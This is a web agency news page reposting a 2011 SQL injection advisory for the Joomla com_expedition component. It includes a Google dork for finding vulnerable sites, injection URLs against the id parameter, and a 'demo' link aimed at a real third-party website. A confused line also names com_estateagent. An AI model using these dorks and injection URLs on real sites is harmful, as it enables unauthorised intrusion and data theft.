Home NewsJoomla Component (com_expedition) SQL Injection Vulnerability

Joomla Component (com_expedition) SQL Injection Vulnerability

09 Octobre 2011

####

# Exploit Title: Joomla Component (com_expedition) <= SQL Injection Vulnerability

# Author: BHG Security Center

# Date: 2011-10-09

# Vendor: N/A

# E-mail: Cette adresse e-mail est protégée contre les robots des spammeurs, vous devez activer Javascript pour la voir. | Cette adresse e-mail est protégée contre les robots des spammeurs, vous devez activer Javascript pour la voir.

# Website: www.black-hg.org

# Google Dork: inurl:index.php?option=com_expedition

# Category:: Webapps

# Tested on: [Windows Vista Edition Intégral- French]

# http://demo15.joomlaapps.com/

####

[*] ExpLo!T :

http://127.0.0.1/index.php?option=com_expedition&task=detail&id=-3235'

http://127.0.0.1/index.php?option=com_expedition&task=detail&id=[SQLi]

http://127.0.0.1/path/index.php?option=com_expedition&task=detail&id=[SQLi]

[*] Demo : http://www.astrobio.net/index.php?option=com_expedition&task=detail&id=-3235

####

Vunl Component : com_estateagent

Error in file joomla Component (com_estateagent) Sql Injection

A vulnerable parameter $ detail&id=

####

Agence Web Annecy et Chambéry - Création et gestion de site Internet

Offre Site Web Vitrine

Site web vitrine à Partir de 600€ HT

Offre Site E-commerce

Site web E-commerce à Partir de 990€ HT

OpenSysCom

Boutique Opensyscom

Joomla Component (com_expedition) SQL Injection Vulnerability

Menu principal

Création de Site Internet

Offre Site Web

Services

Dernières Créations

Dernières actualités

Contenu le plus lu

Agence Web Annecy et Chambéry - Création de site Internet - Opensysweb